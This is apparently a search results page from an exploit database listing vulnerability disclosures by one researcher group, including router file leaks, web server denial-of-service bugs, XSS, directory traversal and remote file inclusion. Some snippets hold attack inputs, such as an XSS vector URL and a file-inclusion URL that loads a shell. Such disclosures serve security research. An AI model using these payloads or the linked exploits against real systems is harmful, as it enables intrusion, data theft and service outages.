16 matches found
Huawei B315s-22 - Information Leak
Product Family: LTE Model B315s – 22 Firmware version: 21.318.01.00.26 Author: Usman Saeed usman at xc0re.net 1. Unauthenticated access to sensitive files: It was observed that the web application running on the router allows unauthenticated access to sensitive files on the web server. POC: By...
Information disclosure
The PROF. USMAN ALI AWHEELA aka com.wPROFUAAWHEELA application 2.1 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate...
CVE-2014-7134
CVE-2014-7134 concerns the Android app “PROF. USMAN ALI AWHEELA” (com.wPROFUAAWHEELA), version 2.1, which does not verify SSL certificates (X.509) from servers. This allows potential attackers performing a man‑in‑the‑middle attack to spoof servers and obtain sensitive information via a crafted certifica...
Kolibri+ Webserver 2 - (Get Request) Denial of Service Vulnerability
No description provided by source. Name : Kolibri+ Webserver 2 , Denial Of service / Crash Author : Usman Saeed Company : Xc0re Security Research Group Date : 06/09/09 Homepage : http://www.xc0re.net Download Page : http://download.cnet.com/Kolibri-WebServer/3000-102484-10896378.html?tag=mncol...
iGuard Security Access Control System Cross Site Scripting
Title ==== iGuard Security Access Control System Webserver, Cross Site Scripting XSS Author ====== Usman Saeed , Xc0re Security Research Group Website : http://www.xc0re.net Twitter : http://twitter.com/xc0resecurity Blog : http://www.xc0re.net/blog Published :...
Polipo 1.0.4.1 - POST/PUT HTTP Header Processing Denial of Service
source: https://www.securityfocus.com/bid/49908/info Polipo is prone to a denial-of-service vulnerability. Remote attackers can exploit this issue to cause the application to crash, denying service to legitimate users. Polipo 1.0.4.1 is vulnerable; other versions may also be affected...
ZyXEL P-660R-T1 V2 Cross Site Scripting
Name : ZyXEL P-660R-T1 V2 XSS Author : Usman Saeed from Xc0re Security Research Group Homepage :http://www.xc0re.net Dated : 22/11/2010 Exploit: VECTOR :http://IP/Forms/home1?&HomeCurrentDate='alert1;'01%2F01%2F2000 This works with the post request ! As by default this value is sent through POST...
Xitami 5.0 - '/AUX' Request Remote Denial of Service
source: https://www.securityfocus.com/bid/40027/info Xitami is prone to a denial-of-service vulnerability. Attackers can exploit this issue to crash the affected application, denying service to legitimate users. Xitami 5.0a0 is vulnerable. !/usr/bin/perl Xitami/5.0a0 Denial Of Service Disclaimer:...
Xitami / 5.0a0 Denial Of Service
Exploit for windows platform in category dos / poc ================================ Xitami / 5.0a0 Denial Of Service ================================ Name : Xitami/5.0a0 Denial Of Service Author: Usman Saeed Company: Xc0re Security Research Group Website:http://www.xc0re.net DATE: 10/05/10 Tested...
Cherokee web server 0.5.4 DoS
No description provided by source. Name : Cherokee Web Server 0.5.4 Denial Of Service Author: Usman Saeed Company: Xc0re Security Research Group Website: http://www.xc0re.net DATE: 25/10/09 Tested on Windows ! Disclaimer: This code is for Educational Purposes , I would Not be responsible for any...
Cherokee web server 0.5.4 DoS
Exploit for unknown platform in category web applications ============================= Cherokee web server 0.5.4 DoS ============================= Name : Cherokee Web Server 0.5.4 Denial Of Service Author: Usman Saeed Tested on Windows ! Disclaimer: This code is for Educational Purposes , I woul...
BRS Webweaver 1.33 - '/Scripts' Access Restriction Bypass
Name : BRS Webweaver Version 1.33 /Scripts access restriction bypass vulnerability Author : Usman Saeed Company : Xc0re Security Research Group Date : 15/09/09 Homepage : http://www.xc0re.net Download Page : http://www.brswebweaver.com/downloads.html Attack type : Remote Patch Status : Unpatched...
Kolibri+ Webserver 2 (GET Request) Remote SEH Overwrite Exploit
Exploit for unknown platform in category remote exploits =============================================================== Kolibri+ Webserver 2 GET Request Remote SEH Overwrite Exploit =============================================================== !/usr/bin/python Could not get this to work on XP...
kolibri+ Web Server 2 - Directory Traversal
kolibri+ Web Server 2 - Directory Traversal Name : Kolibri+ Webserver 2 , Directory Traversal Vulnerability Author : Usman Saeed Company : Xc0re Security Research Group Date : 06/09/09 Homepage : http://www.xc0re.net Download Page :...
phpcontact-rfi.txt
/ phpContact Multiple Remote File Inclusion Vulnerabilities / //Author: Arham Muhammad //Vulnerable Files: /contactbusiness.php, /contactperson.php //Source: http://codewand.org/download/phpContact.zip //Vulnerable Code: include$includepath . "includesession.inc.php"; //Expl0it:...
Web Apps- Rad Upload Version 3.02 Remote File Include Vulnerability
^ Rad Upload Version 3.02 Remote File Include Vulnerability ^ Source: http://www.radinks.com/downloads/raduploadlite.zip ^ Vulnerable C0de On Line 39 In upload.php : ifisset$savepath && $savepath!="" ^ EXploit http://victim/directory/upload.php?savepath=sh3ll? ^ Found3d By: Arham ^ Gr33tz To --...